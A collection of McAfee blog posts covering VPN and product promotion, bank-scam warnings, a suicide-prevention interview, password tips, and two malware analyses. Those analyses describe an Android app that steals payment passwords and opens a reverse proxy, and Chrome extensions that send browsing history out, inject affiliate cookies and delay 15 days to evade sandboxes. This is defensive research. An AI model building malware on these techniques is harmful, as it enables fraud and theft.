The bank-grade encryption used by a strong VPN shields your data and information while it’s in transit, which makes it difficult for hackers to spy on your connection. (Think of your data and information traveling through a tunnel that no one else can use or see into.) In that way, a VPN makes all kinds of online activities more secure—like banking, shopping, and checking up on your finances, even using your apps.  

It protects your privacy. 

By masking your whereabouts and your IP address, along with encryption that helps keep your activities private, a VPN reduces the personal information that others can collect and track. That includes internet service providers, social media companies, businesses, app developers, websites, and others who gather your data for marketing purposes or for resale to third parties. 

A faster and more stable VPN with WireGuard 

A quick word about what WireGuard is in slightly more detail. It’s a VPN protocol, which is a series of technical rules that govern how your device can securely reach the VPN servers, validate your access to the requests you make online, and encrypt your browsing traffic so that only you can see what you are doing over the internet. WireGuard is one of several protocols that we support, such as the OpenVPN and IKEv2 protocols. While WireGuard improves upon OpenVPN and IKEv2 in many ways, both are still secure and safe ways in which a VPN can connect. 

Now with the latest WireGuard standard in place, our VPN for Windows that comes with all our all-in-one plans offers faster speeds and improved stability compared to what previous standards offered. This gives you the security of a VPN with similar performance as if you were on a fully open connection—along with the added benefit of keeping your browsing and other activities private. 

Taken together, the improved speed and stability give privacy-conscious people a further reason to use a VPN more often than before. Because a VPN can minimize the exposure of data as it transmits to and from your devices, companies and data brokers can potentially learn far less about you, your shopping, your travels, your habits, and any other information that they could possibly collect and otherwise profit from. The more often you use a VPN, the less they can potentially gather. 

For more about VPNs and how ours can keep you more private and secure online, give us a visit here any time. 


The post McAfee Secure VPN: Now with WireGuard for Faster Speeds and Enhanced Stability appeared first on McAfee Blog.

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Steer Clear of the “Pay Yourself Scam” That’s Targeting Online Bank Accounts

By Cagla Ruacan — September 23rd 2022 at 13:18

An old banking scam has a new look. And it’s making the rounds again. 

Recently Bank of America alerted its customers of the “Pay Yourself Scam,” where scammers use phony fraud alerts and trick their victims into giving them access to their online banking accounts. It’s a form of phishing attack, and according to Bank of America it goes something like this: 

  • You receive a text message that looks like a fraud alert from your bank about unusual activity. The text may look something like: “Did you make a purchase of $100.00 at ABC merchant?” 
  • If you respond to the text, you have now engaged the scammer and will receive a call from a number that appears to be from a bank. 
  • They’ll appear to be a representative from a bank and will offer to help stop the alleged fraud by asking you to send money to yourself with an online payment app. 
  • The scammer will ask you for a one-time code you just received from a bank. 
  • If you give them the code, they will use it to enroll their bank account details with an online payment service using your email address or phone number. 
  • The scammer can now receive your money into their account. 

The good news is that you can avoid this attack rather easily. If you receive a text or call about a possible fraud alert, don’t respond. (Scammers can easily “spoof” or fake caller ID information nowadays. So even if it appears that the number looks legitimate, it may not be after all.) Instead, contact your bank directly using the contact information on your debit or credit card. This way, you’ll know you’re speaking with the proper representatives about the matter. 

Other ways you can avoid online banking scams 

Of course, this scam isn’t the only scam making the rounds these days. Whether it’s with some form of phishing attack, stealing passwords on public Wi-Fi, or malware that spies on your keystrokes, scammers use plenty of tricks to crack into online bank accounts. Yet with a few precautions and a sharp eye, you have several ways you can protect yourself. 

Use comprehensive online protection software 

Online protection software today goes far beyond antivirus. It can protect your privacy, identity, and your online accounts as well. McAfee+ Ultimate provides our most comprehensive coverage with features that monitor the dark web and sketchy data broker sites for your personal information, identity theft and ransomware protection, and identity restoration services should the unexpected happen—all along with our award-winning antivirus protection. In all, it protects you, not just your devices. Together, it offers your strongest line of defense in the face of hackers, scammers, and thieves. 

Scrutinize any messages claiming to be your bank 

Legitimate banks will never pressure, harass, or cajole you into action. If you get a message that strikes an aggressive tone, assume it’s fraudulent. Other things legitimate banks will never do include:  

  • Banks or other financial institutions don’t call for your PIN or checking account number. Never provide this over the phone. Call your bank directly using the phone number on your debit or credit card or bank statement if you want to confirm.  
  • Your bank has no reason to email you for account information it already has. If you receive an email asking you to click a link or provide account information, assume it’s fraudulent. Don’t click any links and mark the email as spam.  
  • If a message appears to be from your bank asking you to sign in or enter your PIN, it’s a scam. Banks never ask customers for this information by text.  
  • A common theme in phishing emails is the urgent call to action. Cybercriminals want to scare you into acting immediately without thinking. The email says there was suspicious activity on your account, and you should log in immediately to avoid having it frozen or closed. No legitimate business would close a customer’s account without giving reasonable notice. Contact your bank through your normal channels to check your balance and account activity if you aren’t sure.  
  • Misspelled words and grammatical errors are another red flag. Major corporations have professional editors to make sure the content is correct.  

Use your bank’s official website or app 

Earlier, I mentioned contacting your bank directly to ensure you’re speaking to a proper representative. Another way you can go directly to the source is to use your bank’s website or app to check up on your accounts. Once again, don’t click any links in a text or email. Just go to your bank’s website or app to check your account. You can make sure you have your bank’s official app by visiting the Google Play or Apple’s App Store and looking at the information section to ensure that it was indeed developed by your bank—not a copycat. 

Use strong, passwords and a password manager to stay on top of them all 

Strong and unique passwords for each of your online accounts can help keep hackers at bay. With data breaches occurring so often, updating them regularly is important too. Yet with all the accounts we keep, that can mean a lot of work. However, a password manager can create those passwords for you and safely store them as well. Comprehensive security software will include one. 

Use two-factor authentication on your accounts  

Two-factor authentication is an extra layer of defense on top of your username and password. It adds in the use of a special one-time-use code to access your account, usually sent to you via email or to your phone by text or a phone call. In all, it combines something you know, like your password, with something you have, like your smartphone. Together, that makes it tougher for a crook to hack your account. If any of your accounts support two-factor authentication, the few extra seconds it takes to set up is more than worth the big boost in protection you’ll get.  

Don’t access your online banking account via public Wi-Fi 

When you log onto public Wi-Fi, potentially anyone can see your internet activity—and that includes things like entering your username and password. For that reason, only log into your bank account with public Wi-Fi if you’re using a virtual private network (VPN).  McAfee Secure VPN protects your privacy by turning on automatically for unsecured networks. Your data is encrypted so it can’t be read by prying eyes. The VPN also keeps your online activity and physical location private and secure from advertisers.  

Check your bank statements regularly 

Keeping an eye on your bills and statements as they come in can help you spot unusual activity on your accounts. A credit monitoring service can do that one better by keeping daily tabs on changes to your credit report. While you can do this manually, there are limitations. First, it involves logging into each bureau and doing some digging of your own. Second, there are limitations as to how many free credit reports you can pull each year. A service does that for you and without impacting your credit score. 

Depending on your location and plan, McAfee’s credit monitoring allows you to look after your credit score and the accounts within it to see fluctuations and help you identify unusual activity, all in one place, checking daily for signs of identity theft. 

Prevention and vigilance are your best defense from online banking scams  

When a fraud notification pops up on your phone, you can almost feel your stomach drop. Hackers and scammers play off that fear. They use it to get you to act—and to act quickly. Taking a moment to scrutinize these messages and following up directly with your bank can help you steer clear of their tricks. Likewise, putting up a strong defense with comprehensive online protection software can make you safer still. In the meantime, keep your eyes open for this “Pay Yourself Scam” and other scams like it. It’s certainly not the first of its kind, and it won’t be the last. 

The post Steer Clear of the “Pay Yourself Scam” That’s Targeting Online Bank Accounts appeared first on McAfee Blog.

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#WSPD Creating hope through action with The Jordan Legacy

By Life at McAfee — September 19th 2022 at 18:09

*TW: Mentions Suicide

Our passion for protecting people doesn’t stop with online safety. We deeply care for our people, their families and friends, and our communities.

To recognize World Suicide Prevention on Sept. 10 and help normalize and encourage conversations about mental health year-round, we recently hosted a discussion with McAfee colleagues and suicide prevention activist and owner of The Jordan Legacy, Steve Phillip. During this session Steve discussed his own personal lived experience of suicide and what he’s learned since establishing The Jordan Legacy when it comes to creating an open and safe environment for all.

Tell us a bit about The Jordan Legacy?

“I established The Jordan Legacy in 2020, following the suicide of my 34-year-old son, Jordan, in December 2019. It’s a registered not-for-profit Community Interest Company (CIC), whose mission is to raise awareness about suicide, open the conversation, help remove the stigma surrounding this topic and importantly, engage with communities and workplaces to discuss and identify practical solutions which will help prevent suicide.”

Why is World Suicide Prevention Day (WSPD) important?

“#WSPD is important in highlighting the biggest killer of men and women under the age of 35. According to the W.H.O, we lose 700,000 people globally to suicide every year – that’s one person every 45 seconds. On average, each suicide will impact 135 other people. This means that more than 95 million people are impacted by suicide annually! And while #WSPD is an important day to highlight, it’s fundamental that we recognize that suicide awareness needs to happen 365 days a year.”

Why are there stigmas surrounding mental health and suicide?

“There are several reasons why stigmas surrounding mental health and suicide exist. Generally, it’s due to a lack of understanding and people making assumptions – such as those with a mental health illness could be dangerous, unreliable or unemployable. Cultural backgrounds also play a part in creating stigma – certain cultures see mental illness and suicide as a taboo subject. The language used around mental health and suicide can also create stigma. In the UK, the act of attempting suicide was decriminalized in 1961 and yet the term ‘committed suicide’ is still frequently used, in the same way as commit murder or commit assault.”

How can we open-up a conversation and support someone who might be struggling with their mental health?

“It’s important to ask people how they are with a genuine intent to listen to and understand their reply. Most people who are struggling with their mental health don’t necessarily want you to fix them, but they do want to feel that they’re being listened to. Ask open-ended questions, such as ‘tell me how are you really feeling?’, ‘explain to me how this is impacting on you?’, ‘describe to me, how this is making you feel?”

How can we create hope through action – as family members, friends, and colleagues?

“We need to become a kinder and more compassionate society by recognizing that everyone can, at some point in their lives, struggle with poor mental health. Understanding this, would hopefully cause people to be less frustrated with others who don’t behave as they expect they might. We also need to check-in with family members, friends and colleagues more frequently and ask them ‘how are you really doing?”

How can we look after our own well-being?

“I am one of those individuals who probably works too hard and for too long! However, road cycling is a big escape for me and getting out in the fresh air in the countryside is a huge help. As is my part-time hobby of playing the drums – you can lose a lot of pent-up stress whilst playing along to Nirvana!! It’s so important that you make sure to look after yourself. So, my advice is to find out what works for you – whether that’s going for a walk, talking to a friend, speaking to a counsellor, joining a local group or seeing what resources are available to you through your company’s EAP. And remember most importantly to be kind to yourself.”

If you or someone you know is struggling, please call or text 988 to get support. And remember, you are not alone.

Together we can prevent suicide 💛

The post #WSPD Creating hope through action with The Jordan Legacy appeared first on McAfee Blog.

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Fake Security App Found Abuses Japanese Payment System

By McAfee — September 14th 2022 at 17:33

Authored by SangRyol Ryu and Yukihiro Okutomi 

McAfee’s Mobile Research team recently analyzed new malware targeting NTT DOCOMO users in Japan. The malware which was distributed on the Google Play store pretends to be a legitimate mobile security app, but it is in fact a payment fraud malware stealing passwords and abusing reverse proxy targeting NTT DOCOMO mobile payment service users. McAfee researchers notified Google of the malicious apps, スマホ安心セキュリティ, or ‘Smartphone Anshin Security’, package name ‘’ and ‘com.z.px.appx’. The applications are no longer available on Google Play. Google Play Protect has also taken steps to protect users by disabling the apps and providing a warning. McAfee Mobile Security products detect this threat as Android/ProxySpy and protect you from malware. For more information, to get fully protected, visit McAfee Mobile Security.

How Do victims install this malware?

The malware actor continues to publish malicious apps on the Google Play Store with various developer accounts. According to the information posted on Twitter by Yusuke Osumi, Security Researcher at Yahoo! Japan, the attacker sends SMS messages from overseas with a Google Play link to lure users to install the malware. To attract more users, the message entices users to update security software.

A SMS message from France (from Twitter post by Yusuke)

A SMS message from France (from Twitter post by Yusuke)

malware on Google play

Malware on Google Play 

The Mobile Research team also found that the malware actor uses Google Drive to distribute the malware. In contrast to installing an application after downloading an APK file, Google Drive allows users to install APK files without leaving any footprint and makes the installation process simpler. Once the user clicks the link, there are only a few more touches required to run the application. Only three clicks are enough if users have previously allowed the installation of unknown apps on Google Drive.

Following notification from McAfee researchers, Google has removed known Google Drive files associated with the malware hashes listed in this blog post.


What does this malware look like?

When an NTT DOCOMO network user installs and launches this malware, it asks for the Network password. Cleverly, the malware shows incorrect password messages to collect more precise passwords. Of course, it does not matter whether the password is correct or not. It is a way of getting the Network password.

Ask the Network password twice (Only NTT DOCOMO user can see these)
Ask the Network password twice (Only NTT DOCOMO users can see these)

The Network password is used for the NTT DOCOMO payment service which provides easy online payments. NTT DOCOMO mobile network users can start this payment service by just setting 4-digits password called a Network password. The charge will be paid along with the mobile phone bill. When you need to pay online, you can simply do the payment process by entering the 4-digits password.

After the password activity, the malware shows a fake mobile security screen. Interestingly, the layout of the activity is similar to our old McAfee Mobile Security. All buttons look genuine, but these are all fake.

Interface comparison.
Interface comparison.

How does this malware work?

There is a native library named ‘’ loaded during the app execution written in Golang. The library, when loaded, tries to connect to the C2 server using a Web Socket. Web Application Messaging Protocol (WAMP) is used to communicate and process Remote Procedure Calls (RPC). When the connection is made, the malware sends out network information along with the phone number. Then, it registers the client’s procedure commands described in the table below. The web socket connection is kept alive and takes the corresponding action when the command is received from the server like an Agent. And the socket is used to send the Network password out to the attacker when the user enters the Network password on the activity.

RPC Function name Description
connect_to Create reverse proxy and connect to remote server
disconnect Disconnect the reverse proxy
get_status Send the reverse proxy status
get_info Send line number, connection type, operator, and so on
toggle_wifi Set the Wi-Fi ON/OFF
show_battery_opt Show dialog to exclude battery optimization for background work

Registered RPC functions description

Initial Hello packet contains personal information
Initial Hello packet contains personal information
Sending out The Network password
Sending out The Network password

To make a fraudulent purchase by using leaked information, the attacker needs to use the victim’s mobile network. The RPC command ‘toggle_wifi’ can switch the Wi-Fi connection status of the victim, and ‘connect_to’ will provide a reverse proxy to the attacker. A reverse proxy can allow connecting the host behind a NAT (Network Address Translation) or a firewall. Via the proxy, the attacker can send purchase requests via the victim’s mobile network.

Network and command flow diagram
Network and command flow diagram


It is interesting that the malware uses a reverse proxy to steal the user’s network and implement an Agent service with WAMP. McAfee Mobile Research Team will continue to find this kind of threat and protect our customers from mobile threats. It is recommended to be more careful when entering a password or confidential information into untrusted applications.

IoCs (Indicators of Compromise)


SHA256 Package Name Distribution
5d29dd12faaafd40300752c584ee3c072d6fc9a7a98a357a145701aaa85950dd Google Play
e133be729128ed6764471ee7d7c36f2ccb70edf789286cc3a834e689432fc9b0 Other
e7948392903e4c8762771f12e2d6693bf3e2e091a0fc88e91b177a58614fef02 com.z.px.appx Google Play
3971309ce4a3cfb3cdbf8abde19d46586f6e4d5fc9f54c562428b0e0428325ad Other
2ec2fb9e20b99f60a30aaa630b393d8277949c34043ebe994dd0ffc7176904a4 com.jg.rc.papp Google Drive
af0d2e5e2994a3edd87f6d0b9b9a85fb1c41d33edfd552fcc64b43c713cdd956 Google Drive


The post Fake Security App Found Abuses Japanese Payment System appeared first on McAfee Blog.

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The Feeling of Safety with McAfee+

By Cagla Ruacan — September 13th 2022 at 12:15

Safety has a feeling all its own, and that’s what’s at the heart of McAfee+. 

We created McAfee+ so people can not only be safe but feel safe online, particularly in a time when there’s so much concern about identity theft and invasion of our online privacy.   

And those concerns have merit. Last year, reported cases of identity theft and fraud in the U.S. shot up to 5.7 million, to the tune of $5.8 billion in losses, a 70% increase over the year prior. Meanwhile, online data brokers continue to buy and sell highly detailed personal profiles with the data cobbled together from websites, apps, smartphones, connected appliances, and more, all as part of a global data-gathering economy estimated at well over $200 billion a year. 

Yet despite growing awareness of the ways personal information is collected, bought, sold, and even stolen, it remains a somewhat invisible problem. You simply don’t see it as it happens, let alone know who’s collecting what information about you and toward what ends—whether legal, illegal, or somewhere in between. A recent study we conducted showed that 74% of consumers are concerned about keeping their personal information private online. Yet, most of us have found out the hard way (when we search for our name on the internet) that there is a lot of information about us that has been made public. It is our belief that every individual should have the right to be private, yet we know too many individuals don’t know where to begin. It is this very worry that made us focus our new product line on empowering our users to take charge of their privacy and identity online. 

McAfee+ gives you that control. 

Now available in the U.S., McAfee+ provides all-in-one online protection for your identity, privacy, and security. With McAfee+, you’ll feel safer online because you’ll have the tools, guidance and support to take the steps to be safer online. Here’s how: 

  • You’ll see where your personal information appears in risky locations online, such as people search and data broker sites that sell this information to advertisers, in addition to hackers, spammers, and thieves. Then McAfee+ helps you remove it (or depending on the plan we do it for you). We call this Personal Data Cleanup. 

  • It protects you by scanning the dark web for places where your personal information may appear. This way you can keep an eye on your email addresses, social security number, credit card numbers, and more on the dark web—and receive notifications an average of 10 months sooner than similar services if your info is found in a data breach. This gives you ample time to change your passwords before hackers try to access your account. Depending on your plan, McAfee+ offers you $1M identity theft coverage and credit monitoring services as well for additional peace of mind. 
  • You’ll also see how safe you are with our industry-first Protection Score. It checks the health of your online protection and shows you ways you can improve your score so you’re safer still. 

  • And as always, it all includes McAfee’s award-winning antivirus and device security solution.  

You can see the entire range of features that cover your identity, privacy, and security with a visit to our McAfee+ page 

McAfee+ Ultimate offers our most thorough protection, with which you can lock your credit with a click or put a comprehensive security freeze in place, both to thwart potential identity theft. You can keep tabs on your credit with daily credit monitoring and get an alert when there’s credit activity to spot any irregularities quickly.  

You’ll also feel like someone has your back. Even with the most thorough measures in place, identity theft and ransomware attacks can still strike, which can throw your personal and financial life into a tailspin. What do you do? Where do you start? Here, we have you covered. We offer two kinds of coverage that can help you recover your time, money, and good name:  

  • $1 million in identity theft coverage and with the assistance of professional identity restoration specialists who can take steps to repair your identity and credit. 
  • $25,000 in ransomware coverage, which likewise comes with expert support that can help you determine the severity of a ransomware attack, learn what immediate steps you can take, and determine if a ransom should be paid or if alternative options exist. 

Starting today, customers in the U.S. can purchase McAfee+ online at in Premium, Advanced, and Ultimate plans, in addition to individual and family subscriptions. McAfee+ will also be available online in the U.K., Canada, and Australia in the coming weeks with additional regions coming in the months ahead (features may vary by region). 

We are very excited about bringing these new protections to you and we hope you will be too.  

The post The Feeling of Safety with McAfee+ appeared first on McAfee Blog.

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Strong Password Ideas to Keep Your Information Safe

By McAfee — September 7th 2022 at 13:31

Password protection is one of the most common security protocols available. By creating a unique password, you are both proving your identity and keeping your personal information safer. However, when every account you have requires a separate password, it can be an overwhelming task. While you should be concerned about the safety of your data, you also want to avoid the frustration of forgetting your password and being blocked from the information you need. However, the benefits of using strong, unique passwords outweigh the occasional inconvenience.

Benefits of Strong Passwords

The main benefit of a strong password is security. Hackers work quickly when they are trying to access accounts. They want to steal as much information as they can in as short a time as possible. This makes an account with a strong password less inviting because cracking the code is much more involved.

A strong password also limits the damage that hackers can do to your personal accounts. A common strategy involves cracking the passwords of less secure sites with limited personal information. The hackers hope that they can use the password from your gym membership app to access information in your online banking account. Strong password protection prevents this situation.

Common Poor Password Practices

When someone is registering an online account, it can be tempting to blaze through the password process. In order to move quickly, there are several poor password practices that people employ.

  • Simple passwords: Password-cracking programs start by entering obvious combinations. These are passwords where the user puts no thought into the code such as “password” or “1234567”.
  • Repeated passwords: You may think you have such an unbreakable password that you want to use it for all of your accounts. However, this means that if hackers compromise one of your accounts, all of your other accounts are vulnerable.
  • Personal information: The number combinations that you are apt to remember easily are the ones that hackers can find. You may have put your birthday or graduation year on public display in a social media account. Your dog’s name may be unusual, but if you share information about your canine friend with the world, its name is a weak password.

The Meaning of a Strong Password

A password is considered strong when it is difficult for a hacker to crack it quickly. Sophisticated algorithms can run through many password combinations in a short time. A password that is long, complex and unique will discourage attempts to break into your accounts.

  • Long: The combinations that protect your accounts should be long enough that it would be difficult for a computer program to run through all the possible configurations. The four-digit pin on a bank card has 10,000 possible combinations. This might take some time for a human being to crack, but a computer program with unlimited tries could break it in a few seconds. If you were only using numbers, every character in your password would raise the possible combinations by a power of 10. To stump the algorithms, you want a password that is a minimum of 12 characters long.
  • Complex: To increase the challenge of your password, it should have a combination of uppercase letters, lowercase letters, symbols and numbers. Hacking algorithms look for word and number patterns. By mixing the types of characters, you will break the pattern and keep your information safe.
  • Unique: If you have been reusing your passwords, it is time for you to start the work of changing them. Every one of your accounts should have its own password. At the very least, make certain that you have not reused passwords for your financial institutions, social media accounts and any work-related accounts.

Creating a Layered Password

If you want a password that is memorable but strong, you can easily turn a phrase into a layered, complex password. In this process, it is important to note that you should not use personal information that is available online as part of your phrase.

  • Pick a phrase that is memorable for you: It should not be a phrase you commonly use on social media accounts. If you are an avid runner you might choose a phrase like, “Running 26.2 Rocks!”
  • Replace letters with numbers and symbols: Remove the spaces. Then, you can put symbols and numbers in the place of some of the letters. Runn1ng26.2R0ck$!
  • Include a mix of letter cases: Finally, you want both lower and uppercase letters that are not in a clear pattern. Algorithms know how to look for common patterns like camelCase or PascalCase. Runn1NG26.2R0cK$!

Now, you have a password that you can remember while challenging the algorithms hackers use.

Employing a Password Manager

When you consider the number of accounts you need to protect, coming up with a properly layered password is a time-consuming task. Even if you are able to decide on a memorable phrase, there are just too many accounts that need passwords. A password manager is a helpful tool to keep you safe while you are online. It acts as a database for all of your passwords. Each time you create a new code, it stores it so that you can automatically enter it later. You only need to remember a single password to access the tools of your manager.

Most managers can also do the work of creating complex, layered passwords for your accounts. These will be a string of random numbers, letters and characters. They will not be memorable, but you are relying on the manager to do the memorizing. These machine-generated passwords are especially helpful for accounts you rarely access or that do not hold significant information.

Maintaining an Offline Password List

For critical accounts like your bank account or a work-related account, it can be helpful to keep an offline list of your passwords. Complex passwords are meant to be difficult to remember. You may recall the phrase but not all the detailed changes that make it layered. Keeping a document on a zip drive or even in a physical paper file or journal will allow you to access your information if your hardware fails or you are switching to a new system.

Keeping the Whole System Safe

Cracking passwords is just one of the strategies hackers use to steal information. In addition to using strong passwords, it is important to employ comprehensive security software. Strong passwords will help protect your online accounts. Strong overall security will keep your hardware and network safe from danger.

The post Strong Password Ideas to Keep Your Information Safe appeared first on McAfee Blog.

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Malicious Cookie Stuffing Chrome Extensions with 1.4 Million Users

By McAfee Labs — August 29th 2022 at 19:00

Authored by Oliver Devane and Vallabh Chole 

September 9, 2022 Update: Since the original publication of this blog on August 29, 2022, the Flipshope browser extension was updated in the Chrome Store on September 6, 2022 with a version that no longer contains the potentially harmful features originally discussed in this blog.

September 30, 2022 Update: Since the original publication of this blog on August 29, 2022, the AutoBuy browser extension was updated in the Chrome Store on September 17, 2022 with a version that no longer contains the potentially harmful features originally discussed in this blog.


A few months ago, we blogged about malicious extensions redirecting users to phishing sites and inserting affiliate IDs into cookies of eCommerce sites. Since that time, we have investigated several other malicious extensions and discovered 5 extensions with a total install base of over 1,400,000

The extensions offer various functions such as enabling users to watch Netflix shows together, website coupons, and taking screenshots of a website. The latter borrows several phrases from another popular extension called GoFullPage 

Apart from offering the intended functionality, the extensions also track the user’s browsing activity.  Every website visited is sent to servers owned by the extension creator. They do this so that they can insert code into eCommerce websites being visited. This action modifies the cookies on the site so that the extension authors receive affiliate payment for any items purchased.    

The users of the extensions are unaware of this functionality and the privacy risk of every site being visited being sent to the servers of the extension authors.  

The 5 extensions are  

Name  Extension ID  Users 
Netflix Party  mmnbenehknklpbendgmgngeaignppnbe  800,000 

Netflix Party 2 

flijfnhifgdcbhglkneplegafminjnhn  300,000 

FlipShope – Price Tracker Extension 


adikhbfjdbjkhelbdnffogkobkekkkej  80,000 

Full Page Screenshot Capture – Screenshotting 


pojgkmkfincpdkdgjepkmdekcahmckjp  200,000 
AutoBuy Flash Sales  gbnahglfafmhaehbdmjedfhdmimjcbed  20,000 


Technical Analysis 

This section contains the technical analysis of the malicious chrome extension ‘mmnbenehknklpbendgmgngeaignppnbe’. All 5 extensions perform similar behavior.   



The manifest.json sets the background page as bg.html. This HTML file loads b0.js and this is responsible for sending the URL being visited and injecting code into the eCommerce sites. 


The b0.js script contains many functions. This blog will focus on the functions which are responsible for sending the visited URLs to the server and processing the response.  

Chrome extensions work by subscribing to events which they then use as triggers to perform a certain activity. The extensions analyzed subscribe to events coming from chrome.tabs.onUpdated. chrome.tabs.onUpdated will trigger when a user navigates to a new URL within a tab.

Once this event triggers, the extension will set a variable called curl with the URL of the tab by using the tab.url variable. It creates several other variables which are then sent to The POST data is in the following format:

Variable  Description 
Ref  Base64 encoded referral URL 
County  The county of the device 
City  The city of the device 
Zip  The zip code of the device 
Apisend  A random ID generated for the user. 
Name  Base64 encoded URL being visited 
ext_name  The name of the chrome extensions 


The random ID is created by selecting 8 random characters in a character set. The code is shown below: 

The country, city, and zip are gathered using The code is shown below: 

Upon receiving the URL, will check if it matches a list of websites that it has an affiliate ID for, and If it does, it will respond to the query. An example of this is shown below: 

The data returned is in JSON format. The response is checked using the function below and will invoke further functions depending on what the response contains. 

Two of the functions are detailed below: 

Result[‘c’] – passf_url 

If the result is ‘c’ such as the one in this blog, the extension will query the returned URL. It will then check the response and if the status is 200 or 404, it will check if the query responded with a URL. If it did, it would insert the URL that is received from the server as an Iframe on the website being visited.  

Result[‘e’] setCookie 

If the result is ‘e’, the extension would insert the result as a cookie. We were unable to find a response of ‘e’ during our analysis, but this would enable the authors to add any cookie to any website as the extensions had the correct ‘cookie’ permissions.  

Behavioral flow 

The images below show the step-by-step flow of events while navigating to the BestBuy website.  

  1. The user navigates to and the extension posts this URL in a Base64 format to 
  2. responds with “c” and the URL. The “c” means the extension will invoke the function passf_url() 
  3. passf_url() will perform a request against the URL 
  4. the URL queried in step 3 is redirected using a 301 response to with an affiliate ID associated with the Extension owners 
  5. The extension will insert the URL as an Iframe in the site being visited by the user 
  6. Shows the Cookie being set for the Affiliate ID associated with the Extension owners. They will now receive a commission for any purchases made on  

Here is a video of the events 

Time delay to avoid automated analysis 

We discovered an interesting trick in a few of the extensions that would prevent malicious activity from being identified in automated analysis environments. They contained a time check before they would perform any malicious activity. This was done by checking if the current date is > 15 days from the time of installation.  


This blog highlights the risk of installing extensions, even those that have a large install base as they can still contain malicious code.  

McAfee advises its customers to be cautious when installing Chrome extensions and pay attention to the permissions that they are requesting.   

The permissions will be shown by Chrome before the installation of the extension. Customers should take extra steps to verify the authenticity if the extension is requesting permissions that enable it to run on every website you visit such as the one detailed in this blog  

McAfee customers are protected against the malicious sites detailed in this blog as they are blocked with McAfee WebAdvisor as shown below.   

The Malicious code within the extension is detected as JTI/Suspect. Please perform a ‘Full’ scan via the product.  

Type  Value  Product  Detected 
Chrome Extension  Netflix Party – mmnbenehknklpbendgmgngeaignppnbe  Total Protection and LiveSafe  JTI/Suspect 
Chrome Extension  FlipShope – Price Tracker Extension – Version – adikhbfjdbjkhelbdnffogkobkekkkej  Total Protection and LiveSafe  JTI/Suspect 
Chrome Extension  Full Page Screenshot Capture 


Total Protection and LiveSafe  JTI/Suspect 
Chrome Extension  Netflix Party 2 – flijfnhifgdcbhglkneplegafminjnhn  Total Protection and LiveSafe  JTI/Suspect 
Chrome Extension  AutoBuy Flash Sales  gbnahglfafmhaehbdmjedfhdmimjcbed  Total Protection and LiveSafe  JTI/Suspect 
URL  McAfee WebAdvisor  Blocked 
URL  McAfee WebAdvisor  Blocked 
URL  McAfee WebAdvisor   Blocked 
URL  McAfee WebAdvisor  Blocked 
URL  McAfee WebAdvisor  Blocked 
URL  McAfee WebAdvisor  Blocked 

The post Malicious Cookie Stuffing Chrome Extensions with 1.4 Million Users appeared first on McAfee Blog.

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Embrace change! Chris’s McAfee Journey

By Life at McAfee — August 25th 2022 at 16:30

In this career-journey series, Internal Audit Manager Chris shares his recent journey joining the McAfee finance team and why he is always learning something new in his role.

A typical day

I’m an Internal Audit Manager. Essentially, I work with my McAfee colleagues to understand the processes we follow and run tests to confirm everything is happening as it should.

Sometimes people find audits intimidating, but I do my best to reassure people that there are no hidden tricks and I respect their time. We’re just making sure things are going according to plan and we’re fulfilling our responsibilities.

In a typical day, I have three priorities: Dad, Work, Gym.

I’m normally up at 6 a.m. to cook breakfast for my son and myself, and then drop him off at school. His favorite is bacon and eggs! Since I work with people around the world, I catch up on emails and then review the day’s work and catch up with my team. From there, most of my day is spent in meetings with McAfee colleagues or external auditors.

Somewhere in the day I get in a one-hour workout. It’s tough to do sometimes, but I’d say I get to the gym 90% of the time. It’s a great reset for me: a time where I can focus on me and putting my body to the test.

And, of course, I pick up my son from school and have Dad Time! That’s really my day in repeat. It seems like the same thing but feels different every day. I’m always meeting new people and puzzling through different problems. Every day is a fresh challenge.

Joining McAfee

After interviewing with my future co-workers, I was excited to join the company. I thought, “Oh, this company is fun!” The culture seemed to be a place where not only do you get to come for work, but also have sense of community within it.

Also, it was a chance to work for a great boss. I knew she was a great boss because I worked for her before. She gives you the vision, then gives you the freedom to explore and get the work done. You really get to own your work. I appreciate that.​​

At McAfee, employees are a top priority. You’re not just a robot who has to work-work-work. It’s okay to have fun and take 10 minutes out to see how others are doing.

I like the way the company comes together to have contests and other fun activities. In Finance, we recently had a scavenger hunt with 70 people. It was great seeing the faces of people you’ve only talked to on the phone.

Another way we engage each other is with a recognition program called Bravo! You can write a letter to someone saying hey, I appreciate you. That makes you feel more valued as an employee.

I also like the quarterly updates we get from leaders. At other companies, I’ve seen that done once a year. It’s nice to hear from the CEO every quarter about what’s going on in the organization.​​​​​​​​​​​​​​

Learning and MAHC

There are two parts that make my role so rewarding. The first is I enjoy interacting with people and have a passion for learning. In this job, you hear so many cool stories, and I’m exposed to so many different areas and processes in across the business. There’s always something new to learn. It makes every day different.

Secondly, at McAfee I’m part of the McAfee African Heritage Community (MAHC). We get together and talk about things we want to share with other Community members and the rest of McAfee. I’ve met people I never would run into otherwise. That’s important to me as someone who’s fairly new to McAfee plus having worked remote all this time. It’s very cool to be part of a company that supports having communities.​​​​​​​​​​​​​​​​​​​​​

Getting outside my comfort zone

Honestly, my job is always outside my comfort zone. There’s always a new problem to be solved. But I like that. The way I see it, if you’re comfortable, you aren’t growing. You need to do something you haven’t done before to move to the next level.

As an auditor, I’m always helping others understand the audit process and how to provide solid information, so the audit goes well.

​​​​​​​Communication is key

One of the most helpful skills I have developed during my career is communication. I need to establish a rapport quickly in my work so we can work well together. Everybody is different, right? Some are more direct, some are more indirect, and some people are more casual than others. You always need to adjust when you meet people. Good communication skills help prevent misunderstandings, which is especially important in a global company like McAfee with so many different cultures.

My advice to anyone looking to drive their career forward is…

Embrace change! Change is just another way to grow, learn, and realize potential you didn’t know you had. Look at it as an opportunity. Raise your hand up when problems arise and take on that tough problem. The person who fixes the problem is the person everyone remembers.

The post Embrace change! Chris’s McAfee Journey appeared first on McAfee Blog.

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How to Stay One Step Ahead of Hackers

By McAfee — August 3rd 2022 at 00:23

Whether using the internet for play or work, you want to spend your time online enjoying the peace of mind that comes with having a secure network. 

You don’t want to contend with someone taking your personal data — whether it’s credit card information, passwords, or bank account details — via malware or a data breach on your Android, Windows, or Apple iOS device. 

Fortunately, with some sensible precautions and simple steps, you can use your connected devices productively without worrying about cybercriminals and malicious software. This article explains how to stop hackers from getting access to your sensitive data 

8 ways to protect your identity from hackers

You can take steps to protect your different computing and mobile devices and operating systems. These steps can be divided into technological solutions and the right awareness and information to provide a comforting measure of self-protection. 

It’s like learning karate for self-defense, giving you confidence as you negotiate the wider world (and hoping that you never have to use it). 

Use identity protection software

